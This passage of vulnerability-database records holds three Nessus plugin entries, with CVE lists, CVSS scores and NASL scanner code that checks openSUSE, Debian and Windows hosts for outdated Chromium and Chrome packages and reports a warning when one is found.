Heap buffer overflow in WebGL. \n\n - CVE-2019-5771: Heap buffer overflow in SwiftShader.\n\n - CVE-2019-5772: Use after free in PDFium. \n\n - CVE-2019-5773: Insufficient data validation in\n IndexedDB.\n\n - CVE-2019-5774: Insufficient validation of untrusted\n input in SafeBrowsing. \n\n - CVE-2019-5775: Insufficient policy enforcement in\n Omnibox. \n\n - CVE-2019-5776: Insufficient policy enforcement in\n Omnibox. \n\n - CVE-2019-5777: Insufficient policy enforcement in\n Omnibox. \n\n - CVE-2019-5778: Insufficient policy enforcement in\n Extensions.\n\n - CVE-2019-5779: Insufficient policy enforcement in\n ServiceWorker.\n\n - CVE-2019-5780: Insufficient policy enforcement. \n\n - CVE-2019-5781: Insufficient policy enforcement in\n Omnibox.\n\nFor a full list of changes refer to\nhttps://chromereleases.googleblog.com/2019/02/stable-channel-update-fo\nr-desktop.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1123641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1124936\"\n );\n # https://chromereleases.googleblog.com/2019/02/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?861498a3\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5782\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-72.0.3626.96-lp150.2.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-72.0.3626.96-lp150.2.41.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-72.0.3626.96-lp150.2.41.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-72.0.3626.96-lp150.2.41.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-72.0.3626.96-lp150.2.41.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-04T14:41:22", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2018-17481 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2019-5754 Klzgrad discovered an error in the QUIC networking implementation.\n\n - CVE-2019-5755 Jay Bosamiya discovered an implementation error in the v8 JavaScript library.\n\n - CVE-2019-5756 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2019-5757 Alexandru Pitis discovered a type confusion error in the SVG image format implementation.\n\n - CVE-2019-5758 Zhe Jin discovered a use-after-free issue in blink/webkit.\n\n - CVE-2019-5759 Almog Benin discovered a use-after-free issue when handling HTML pages containing select elements.\n\n - CVE-2019-5760 Zhe Jin discovered a use-after-free issue in the WebRTC implementation.\n\n - CVE-2019-5762 A use-after-free issue was discovered in the pdfium library.\n\n - CVE-2019-5763 Guang Gon discovered an input validation error in the v8 JavaScript library.\n\n - CVE-2019-5764 Eyal Itkin discovered a use-after-free issue in the WebRTC implementation.\n\n - CVE-2019-5765 Sergey Toshin discovered a policy enforcement error.\n\n - CVE-2019-5766 David Erceg discovered a policy enforcement error.\n\n - CVE-2019-5767 Haoran Lu, Yifan Zhang, Luyi Xing, and Xiaojing Liao reported an error in the WebAPKs user interface.\n\n - CVE-2019-5768 Rob Wu discovered a policy enforcement error in the developer tools.\n\n - CVE-2019-5769 Guy Eshel discovered an input validation error in blink/webkit.\n\n - CVE-2019-5770 hemidallt discovered a buffer overflow issue in the WebGL implementation.\n\n - CVE-2019-5772 Zhen Zhou discovered a use-after-free issue in the pdfium library.\n\n - CVE-2019-5773 Yongke Wong discovered an input validation error in the IndexDB implementation.\n\n - CVE-2019-5774 Junghwan Kang and Juno Im discovered an input validation error in the SafeBrowsing implementation.\n\n - CVE-2019-5775 evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5776 Lnyas Zhang discovered a policy enforcement error.\n\n - CVE-2019-5777 Khalil Zhani discovered a policy enforcement error.\n\n - CVE-2019-5778 David Erceg discovered a policy enforcement error in the Extensions implementation.\n\n - CVE-2019-5779 David Erceg discovered a policy enforcement error in the ServiceWorker implementation.\n\n - CVE-2019-5780 Andreas Hegenberg discovered a policy enforcement error.\n\n - CVE-2019-5781 evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5782 Qixun Zhao discovered an implementation error in the v8 JavaScript library.\n\n - CVE-2019-5783 Shintaro Kobori discovered an input validation error in the developer tools.\n\n - CVE-2019-5784 Lucas Pinheiro discovered an implementation error in the v8 JavaScript library.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-02-19T00:00:00", "type": "nessus", "title": "Debian DSA-4395-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17481", "CVE-2019-5754", "CVE-2019-5755", "CVE-2019-5756", "CVE-2019-5757", "CVE-2019-5758", "CVE-2019-5759", "CVE-2019-5760", "CVE-2019-5762", "CVE-2019-5763", "CVE-2019-5764", "CVE-2019-5765", "CVE-2019-5766", "CVE-2019-5767", "CVE-2019-5768", "CVE-2019-5769", "CVE-2019-5770", "CVE-2019-5772", "CVE-2019-5773", "CVE-2019-5774", "CVE-2019-5775", "CVE-2019-5776", "CVE-2019-5777", "CVE-2019-5778", "CVE-2019-5779", "CVE-2019-5780", "CVE-2019-5781", "CVE-2019-5782", "CVE-2019-5783", "CVE-2019-5784"], "modified": "2022-05-24T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4395.NASL", "href": "https://www.tenable.com/plugins/nessus/122272", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4395. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122272);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/24\");\n\n script_cve_id(\"CVE-2018-17481\", \"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5783\", \"CVE-2019-5784\");\n script_xref(name:\"DSA\", value:\"4395\");\n\n script_name(english:\"Debian DSA-4395-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2018-17481\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2019-5754\n Klzgrad discovered an error in the QUIC networking\n implementation.\n\n - CVE-2019-5755\n Jay Bosamiya discovered an implementation error in the\n v8 JavaScript library.\n\n - CVE-2019-5756\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2019-5757\n Alexandru Pitis discovered a type confusion error in the\n SVG image format implementation.\n\n - CVE-2019-5758\n Zhe Jin discovered a use-after-free issue in\n blink/webkit.\n\n - CVE-2019-5759\n Almog Benin discovered a use-after-free issue when\n handling HTML pages containing select elements.\n\n - CVE-2019-5760\n Zhe Jin discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2019-5762\n A use-after-free issue was discovered in the pdfium\n library.\n\n - CVE-2019-5763\n Guang Gon discovered an input validation error in the v8\n JavaScript library.\n\n - CVE-2019-5764\n Eyal Itkin discovered a use-after-free issue in the\n WebRTC implementation.\n\n - CVE-2019-5765\n Sergey Toshin discovered a policy enforcement error.\n\n - CVE-2019-5766\n David Erceg discovered a policy enforcement error.\n\n - CVE-2019-5767\n Haoran Lu, Yifan Zhang, Luyi Xing, and Xiaojing Liao\n reported an error in the WebAPKs user interface.\n\n - CVE-2019-5768\n Rob Wu discovered a policy enforcement error in the\n developer tools.\n\n - CVE-2019-5769\n Guy Eshel discovered an input validation error in\n blink/webkit.\n\n - CVE-2019-5770\n hemidallt discovered a buffer overflow issue in the\n WebGL implementation.\n\n - CVE-2019-5772\n Zhen Zhou discovered a use-after-free issue in the\n pdfium library.\n\n - CVE-2019-5773\n Yongke Wong discovered an input validation error in the\n IndexDB implementation.\n\n - CVE-2019-5774\n Junghwan Kang and Juno Im discovered an input validation\n error in the SafeBrowsing implementation.\n\n - CVE-2019-5775\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5776\n Lnyas Zhang discovered a policy enforcement error.\n\n - CVE-2019-5777\n Khalil Zhani discovered a policy enforcement error.\n\n - CVE-2019-5778\n David Erceg discovered a policy enforcement error in the\n Extensions implementation.\n\n - CVE-2019-5779\n David Erceg discovered a policy enforcement error in the\n ServiceWorker implementation.\n\n - CVE-2019-5780\n Andreas Hegenberg discovered a policy enforcement error.\n\n - CVE-2019-5781\n evil1m0 discovered a policy enforcement error.\n\n - CVE-2019-5782\n Qixun Zhao discovered an implementation error in the v8\n JavaScript library.\n\n - CVE-2019-5783\n Shintaro Kobori discovered an input validation error in\n the developer tools.\n\n - CVE-2019-5784\n Lucas Pinheiro discovered an implementation error in the\n v8 JavaScript library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-17481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5757\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5758\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5759\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5760\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5765\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5767\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5770\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5774\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5779\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5780\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5783\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4395\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 72.0.3626.96-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5783\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"chromedriver\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-driver\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-l10n\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-shell\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"chromium-widevine\", reference:\"72.0.3626.96-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:34:00", "description": "The version of Google Chrome installed on the remote Windows host is prior to 79.0.3945.79. It is, therefore, affected by multiple vulnerabilities as referenced in the 2019_12_stable-channel-update-for-desktop advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-11T00:00:00", "type": "nessus", "title": "Google Chrome < 79.0.3945.79 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_79_0_3945_79.NASL", "href": "https://www.tenable.com/plugins/nessus/131954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131954);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2019-13725\",\n \"CVE-2019-13726\",\n \"CVE-2019-13727\",\n \"CVE-2019-13728\",\n \"CVE-2019-13729\",\n \"CVE-2019-13730\",\n \"CVE-2019-13732\",\n \"CVE-2019-13734\",\n \"CVE-2019-13735\",\n \"CVE-2019-13736\",\n \"CVE-2019-13737\",\n \"CVE-2019-13738\",\n \"CVE-2019-13739\",\n \"CVE-2019-13740\",\n \"CVE-2019-13741\",\n \"CVE-2019-13742\",\n \"CVE-2019-13743\",\n \"CVE-2019-13744\",\n \"CVE-2019-13745\",\n \"CVE-2019-13746\",\n \"CVE-2019-13747\",\n \"CVE-2019-13748\",\n \"CVE-2019-13749\",\n \"CVE-2019-13750\",\n \"CVE-2019-13751\",\n \"CVE-2019-13752\",\n \"CVE-2019-13753\",\n \"CVE-2019-13754\",\n \"CVE-2019-13755\",\n \"CVE-2019-13756\",\n \"CVE-2019-13757\",\n \"CVE-2019-13758\",\n \"CVE-2019-13759\",\n \"CVE-2019-13761\",\n \"CVE-2019-13762\",\n \"CVE-2019-13763\",\n \"CVE-2019-13764\"\n );\n\n script_name(english:\"Google Chrome < 79.0.3945.79 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 79.0.3945.79. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2019_12_stable-channel-update-for-desktop advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5e80c206\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025067\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1027152\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/944619\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1024758\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025489\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1028862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1023817\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1028863\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1020899\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1013882\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1017441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/824715\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1005596\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1011950\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1017564\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/754304\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/853670\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/990867\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/999932\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1018528\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/993706\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1010765\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025464\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025470\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1025471\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/442579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/696208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/708595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/884693\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/979441\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/901789\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1002687\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1004212\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1011600\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1032080\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 79.0.3945.79 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-13725\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate 